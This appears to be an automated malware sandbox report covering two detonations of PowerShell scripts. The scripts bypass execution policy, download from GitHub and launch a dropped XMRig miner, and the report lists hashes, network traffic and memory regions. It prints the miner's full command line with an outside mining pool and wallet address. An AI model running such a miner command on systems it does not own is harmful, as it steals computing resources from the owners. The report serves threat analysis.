US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
NL 23.62.61.106:443 www.bing.com tcp
US 8.8.8.8:53 106.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 24.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 106.246.116.51.in-addr.arpa udp

Files

memory/452-0-0x00007FFE770A3000-0x00007FFE770A5000-memory.dmp

memory/452-10-0x000001E65E070000-0x000001E65E092000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4kwxmzxl.552.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/452-11-0x00007FFE770A0000-0x00007FFE77B61000-memory.dmp

memory/452-12-0x00007FFE770A0000-0x00007FFE77B61000-memory.dmp

memory/452-14-0x00007FFE770A0000-0x00007FFE77B61000-memory.dmp

memory/452-15-0x000001E65E320000-0x000001E65E332000-memory.dmp

memory/452-16-0x000001E65D6A0000-0x000001E65D6AA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1088-47-0x0000021C06180000-0x0000021C061A0000-memory.dmp

memory/1088-48-0x0000021C061C0000-0x0000021C061E0000-memory.dmp

memory/1088-49-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-51-0x0000021C061E0000-0x0000021C06200000-memory.dmp

memory/1088-52-0x0000021C06200000-0x0000021C06220000-memory.dmp

memory/452-50-0x00007FFE770A0000-0x00007FFE77B61000-memory.dmp

memory/452-54-0x00007FFE770A3000-0x00007FFE770A5000-memory.dmp

memory/1088-53-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/452-55-0x00007FFE770A0000-0x00007FFE77B61000-memory.dmp

memory/1088-56-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-59-0x0000021C06200000-0x0000021C06220000-memory.dmp

memory/1088-58-0x0000021C061E0000-0x0000021C06200000-memory.dmp

memory/1088-57-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-60-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-61-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-62-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-63-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-64-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-65-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-66-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-67-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-68-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-69-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-70-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-71-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-72-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-73-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-74-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-75-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-76-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-77-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-78-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-79-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-80-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-81-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-82-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-83-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-84-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-85-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-86-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-87-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-88-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-89-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-90-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-91-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-92-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-93-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-94-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-95-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-96-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-97-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-98-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-99-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-100-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-101-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-102-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-103-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-104-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-105-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-106-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-107-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-108-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-109-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-110-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-111-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-112-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-113-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-114-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-115-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-116-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-117-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

memory/1088-118-0x00007FF7A9B10000-0x00007FF7AA743000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:34

Platform

win10-20240404-en

Max time kernel

1799s

Max time network

1742s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 171.117.168.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 56.94.73.104.in-addr.arpa udp

Files

memory/824-0-0x00007FFC92233000-0x00007FFC92234000-memory.dmp

memory/824-5-0x00000168DD250000-0x00000168DD272000-memory.dmp

memory/824-7-0x00007FFC92230000-0x00007FFC92C1C000-memory.dmp

memory/824-10-0x00007FFC92230000-0x00007FFC92C1C000-memory.dmp

memory/824-11-0x00000168F6390000-0x00000168F6406000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xddr0ppr.n5w.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/824-27-0x00007FFC92230000-0x00007FFC92C1C000-memory.dmp

memory/824-51-0x00000168F58D0000-0x00000168F58E2000-memory.dmp

memory/824-64-0x00000168F58B0000-0x00000168F58BA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1704-93-0x0000012A16020000-0x0000012A16040000-memory.dmp

memory/1704-94-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/824-95-0x00007FFC92233000-0x00007FFC92234000-memory.dmp

memory/824-96-0x00007FFC92230000-0x00007FFC92C1C000-memory.dmp

memory/1704-97-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-98-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-99-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-100-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-101-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-102-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-103-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-104-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-105-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-106-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-107-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-108-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-109-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-110-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-111-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-112-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-113-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-114-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-115-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-116-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-117-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-118-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-119-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-120-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-121-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-122-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-123-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-124-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-125-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-126-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-127-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-128-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-129-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-130-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-131-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-132-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-133-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-134-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-135-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-136-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-137-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-138-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-139-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-140-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-141-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-142-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-143-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-144-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-145-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-146-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-147-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-148-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-149-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-150-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-151-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-152-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-153-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-154-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-155-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-156-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-157-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

memory/1704-158-0x00007FF6B5E60000-0x00007FF6B6A93000-memory.dmp

Analysis: behavioral27

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:53

Platform

win10v2004-20240426-en

Max time kernel

1799s

Max time network

1780s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 17.173.189.20.in-addr.arpa udp

Files

memory/4692-0-0x00007FFF0B583000-0x00007FFF0B585000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bciho5vh.t3t.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4692-11-0x0000016ADC2A0000-0x0000016ADC2C2000-memory.dmp

memory/4692-10-0x00007FFF0B580000-0x00007FFF0C041000-memory.dmp

memory/4692-12-0x00007FFF0B580000-0x00007FFF0C041000-memory.dmp

memory/4692-14-0x00007FFF0B580000-0x00007FFF0C041000-memory.dmp

memory/4692-15-0x0000016ADC680000-0x0000016ADC692000-memory.dmp

memory/4692-16-0x0000016ADC4E0000-0x0000016ADC4EA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3532-47-0x0000021144E90000-0x0000021144EB0000-memory.dmp

memory/3532-48-0x0000021146690000-0x00000211466B0000-memory.dmp

memory/3532-49-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/4692-50-0x00007FFF0B580000-0x00007FFF0C041000-memory.dmp

memory/3532-51-0x00000211466D0000-0x00000211466F0000-memory.dmp

memory/3532-52-0x00000211466B0000-0x00000211466D0000-memory.dmp

memory/4692-54-0x00007FFF0B583000-0x00007FFF0B585000-memory.dmp

memory/3532-53-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-55-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/4692-56-0x00007FFF0B580000-0x00007FFF0C041000-memory.dmp

memory/3532-57-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-58-0x00000211466D0000-0x00000211466F0000-memory.dmp

memory/3532-59-0x00000211466B0000-0x00000211466D0000-memory.dmp

memory/3532-60-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-61-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-62-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-63-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-64-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-65-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-66-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-67-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-68-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-69-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-70-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-71-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-72-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-73-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-74-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-75-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-76-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-77-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-78-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-79-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-80-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-81-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-82-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-83-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-84-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-85-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-86-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-87-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-88-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

memory/3532-89-0x00007FF654EE0000-0x00007FF655B13000-memory.dmp

